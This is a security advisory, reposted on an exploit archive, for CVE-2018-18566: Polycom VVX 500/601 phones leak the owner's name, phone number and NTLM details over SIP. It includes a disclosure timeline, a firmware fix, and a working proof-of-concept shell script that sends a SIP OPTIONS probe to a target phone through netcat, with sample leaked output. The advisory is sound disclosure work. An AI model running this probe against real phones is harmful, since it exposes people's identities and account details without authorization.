exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure

Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure
Posted Oct 24, 2018
Authored by Micha Borrmann | Site syss.de

Polycom VVX 500 / VVX 601 versions 5.8.0.12848 and below suffer from an information exposure vulnerability.

tags | exploit
advisories | CVE-2018-18566
SHA-256 | 3946095174c52f0117914befe41f9b683f9acdfb9bf275dc1ae13b547ebad25b

Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID: SYSS-2018-028
Product: VVX 500 / VVX 601
Manufacturer: Polycom
Affected Version(s): <= 5.8.0.12848
Tested Version(s): 5.4.0.10182, 5.8.0.12848
Vulnerability Type: Information Exposure (CWE-200)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2018-08-29
Solution Date: 20??-??-??
Public Disclosure: 2018-10-23
CVE Reference: CVE-2018-18566
Authors of Advisory: Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone leaks the configured phone number
and the name to unauthorized clients via SIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Script getdatafrompolycom.sh

#!/bin/sh
# Micha Borrmann <micha.borrmann@syss.de>

OWNIP=192.168.100.102

if [ -z "$1" ]
then
echo "Please enter an IPv4 address as target"
exit
else
TARGET=$1
fi

echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '$OWNIP':5060
To: <sip:'$OWNIP':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 $TARGET 5060

Start the script against a phone and see the result:

$ ./getpolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:micha.borrmann@example.com;opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:micha.borrmann@example.com>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware which has disabled the SIP service by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory
may be updated in order to provide as accurate information as
possible. The latest version of this security advisory is available on
the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlvO5bkACgkQ7b4m5xTq
WHZWBg//eaZW/155/oKVQ5bH8jZ8bPpfe2mbETZ1xU4df60IG16g8/Tz61TEcAu7
N9q3XtdR389shVEG+EQ2Fg9EA5loVX1MMAT3YvaITJbMoRSmX53Sa68mUaPBMWAl
KZQKJD0kFlywsPL25BUQoJVVjvV+y3X45opRQ6u+wf4j5zdrS381CXG1zo4i5YWz
ENHv8uKrcgfTkGpejb61+dAH3K4VssjDNES3kvv1EfCQzOPY8TfTOGQ4MrRPwnZo
p2cfNjIUwKfkqEbNVA/WSiSNOSM12H9DgxzzZI/QxRS76d2pNtWBARVwxArS/DPK
A/lyFswBBCP2timeq+94FC0pXSfCNZazgD4O/pcLXVMis3FiTiJOdRyVrX8pYdr+
Pe+qsve/m+r0fO6dmOimIzx7I/GIT6ARYqJ5cbXdtDDGKAUpNjKixZxjPnBjWst4
tuVHn6PINzPmvGxBcZu4i8VxUPsTXMl992xz/3JDNtIy6sklfwhAN1wdJqLjB4yW
XkirVDdS1aTkLyrs+P19XGDwq+aE19K0PksA1aglv5Ha3VxJWqiaYVOSeFpE+/Ur
jpzNmDtbr8FTq9G1JYgstcCvEv325gd11zvCMsG23cgIBLFqi8r7VWqXGuABPI/b
/upHU1fv2sZe8PHexfFuyO7f0w1LGDrcL+IXoLyDKRVNc3joC7c=
=dxlv
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close